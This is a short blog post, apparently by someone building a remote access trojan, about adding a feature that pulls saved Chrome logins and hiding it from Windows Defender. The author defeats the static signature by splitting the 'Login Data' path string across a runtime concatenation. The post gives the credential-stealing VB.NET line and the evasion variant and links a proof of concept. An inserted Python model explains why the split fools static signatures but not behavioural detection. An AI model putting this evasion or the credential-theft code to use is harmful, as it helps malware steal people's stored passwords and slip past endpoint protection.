Bypassing Windows Defender by splitting a string

While working on the client for the RAT I discovered a "funny" Windows Defender behaviour. I wanted to add a feature that collects stored login information from Google Chrome. After a quick Google search I found a code example to extract this information. Of course, this code snippet was a little bit older and was detected by Windows Defender as soon as it was compiled.

After some trial and error I found out that this line of code causes the detection:

Dim sqllogin As New SQLiteHandler(GetFolderPath(SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login Data")

Specifically, the string "Login Data" causes the detection. By putting the word "Data" into a variable and concatenating it at runtime, so that the complete string no longer appears as a single literal in the compiled assembly, no detection is triggered:

Dim a = "Data"
Dim sqllogin As New SQLiteHandler(GetFolderPath(SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login " + a)
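As an added illustration (not code from the post or from the DefenderBypassPoC repository), here is a small Python model of why the split works and what it does not change. It assumes, which the experiment above suggests but does not prove, that the static signature matched the contiguous UTF-16LE bytes of "Login Data" in the compiled assembly's user-string heap; the profile path and the `behavioural_hit` rule are constructed for the demonstration and are not Defender's actual logic.

```python
"""Toy model of the split-string evasion from the post (added example, not
code from the post or the DefenderBypassPoC repository).

Assumption (suggested by the post's experiment, not verified against the real
signature): the static detection matched the contiguous UTF-16LE bytes of the
literal "Login Data" stored in the compiled .NET assembly's user-string (#US)
heap. The profile path and the behavioural rule below are constructed for the
demonstration and are not Defender's actual logic.
"""

SIGNATURE = "Login Data"
CHROME_LOGIN_DATA = r"\Google\Chrome\User Data\Default\Login Data"

# Constructed: the string literals each variant of the VB.NET line leaves in
# the assembly. `Dim a = "Data"` is a local variable, not a Const, so the
# compiler does not fold it back into one literal.
ORIGINAL_LITERALS = [r"\Google\Chrome\User Data\Default\Login Data"]
SPLIT_LITERALS = ["Data", r"\Google\Chrome\User Data\Default\Login "]


def user_string_heap(literals):
    """Approximate the #US heap (ECMA-335 II.24.2.4): an empty entry first,
    then per literal a one-byte length prefix (fine below 0x80 bytes), the
    UTF-16LE text and a trailing flag byte."""
    heap = bytearray(b"\x00")
    for s in literals:
        data = s.encode("utf-16-le")
        length = len(data) + 1  # text plus the flag byte
        if length >= 0x80:
            raise ValueError("one-byte compressed length only in this model")
        heap += bytes([length]) + data + b"\x00"
    return bytes(heap)


def static_signature_hit(literals):
    """Model of a byte-pattern signature: the UTF-16LE encoding of SIGNATURE
    must occur contiguously somewhere in the heap."""
    return SIGNATURE.encode("utf-16-le") in user_string_heap(literals)


def original_path(local_app_data):
    """Mirrors the flagged VB.NET line: one literal appended to %LOCALAPPDATA%."""
    return local_app_data + r"\Google\Chrome\User Data\Default\Login Data"


def split_path(local_app_data):
    """Mirrors the unflagged variant: the last word is joined at runtime."""
    a = "Data"
    return local_app_data + r"\Google\Chrome\User Data\Default\Login " + a


def behavioural_hit(path):
    """Constructed file-access rule, the kind an EDR applies to the path a
    process actually opens: it only sees the final string, so the split
    makes no difference to it."""
    return path.lower().endswith(CHROME_LOGIN_DATA.lower())


def compare(local_app_data=r"C:\Users\alice\AppData\Local"):
    """Both checks against both variants; the default profile path is made up."""
    return {
        "original": {
            "static": static_signature_hit(ORIGINAL_LITERALS),
            "behavioural": behavioural_hit(original_path(local_app_data)),
        },
        "split": {
            "static": static_signature_hit(SPLIT_LITERALS),
            "behavioural": behavioural_hit(split_path(local_app_data)),
        },
    }


if __name__ == "__main__":
    for variant, result in compare().items():
        print(f"{variant:9s} static={result['static']!s:5s} "
              f"behavioural={result['behavioural']}")
```

Under this model the original literals trip the static check and the split ones do not, while both variants produce the identical path and trip the behavioural rule. That is the limit of the trick: it only defeats a signature that matches the literal bytes; the program still opens the same file, so anything keyed on the actual file access is untouched.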

I uploaded a PoC here: https://github.com/Daniel-itsec/DefenderBypassPoC

However, when I uploaded the PoC to VirusTotal it received 10/72 detections. Not that many, I think...


Daniel
